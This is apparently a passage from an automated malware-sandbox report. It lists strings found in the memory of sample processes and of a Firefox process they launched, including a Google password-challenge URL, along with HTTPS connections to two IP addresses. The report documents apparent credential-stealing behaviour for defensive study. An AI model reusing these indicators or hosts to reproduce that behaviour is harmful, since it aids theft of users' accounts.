                          Source: firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://twitter.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                          Source: firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/Z
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                          Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/Z
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3578317189.000001F944FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/Fixes
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: firefox.exe, 0000002F.00000002.3502039099.000001F944259000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3578317189.000001F944FE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3409063603.000001F94B1EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                          Source: firefox.exe, 0000002F.00000002.3584635396.000001F945E9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://www.google.com/policies/privacy/2
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchprincipalToInherit_base64__instrumentation_summary
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_ke
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                          Source: fc1511c233.exe, 0000001B.00000003.3316512327.0000000005B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                          Source: firefox.exe, 0000002F.00000002.3444990370.000001F93EEB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940935000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3468613380.000001F943CC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3468613380.000001F943CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B5BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/How
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/mr2022-backgroundtaskmessage-notification-release-
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
                          Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
                          Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                          Source: firefox.exe, 0000002F.00000002.3429915034.000000E10C6FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.orgo
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                          Source: firefox.exe, 0000002F.00000002.3777834058.00001AB50B63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comG
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://www.openh264.org//
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/Z
                          Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: firefox.exe, 0000002F.00000002.3777834058.00001AB50B63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.caHG
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://www.widevine.com/3
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Z
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningWindow_Cc_ontrollersWarningwindow.controllers/Controllers
                          Source: firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://yandex.com
                          Source: firefox.exe, 0000002F.00000002.3504039978.000001F944303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3444990370.000001F93EE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D10F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3578317189.000001F944F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 0000002D.00000002.3339715441.0000014A64AC7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3352679269.000001670521A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3436300890.000001F932589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                          Source: firefox.exe, 0000002F.00000002.3436300890.000001F932589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdL
                          Source: firefox.exe, 0000002F.00000002.3439700563.000001F934169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                          Source: firefox.exe, 0000002F.00000002.3420008942.000000E104BD8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdPPBd
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://6edd
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://9eee
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account_transitionViews/viewRect
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                          Source: unknownHTTPS traffic detected: 172.67.181.44:443 -> 192.168.2.6:49945 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50002 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50009 version: TLS 1.2
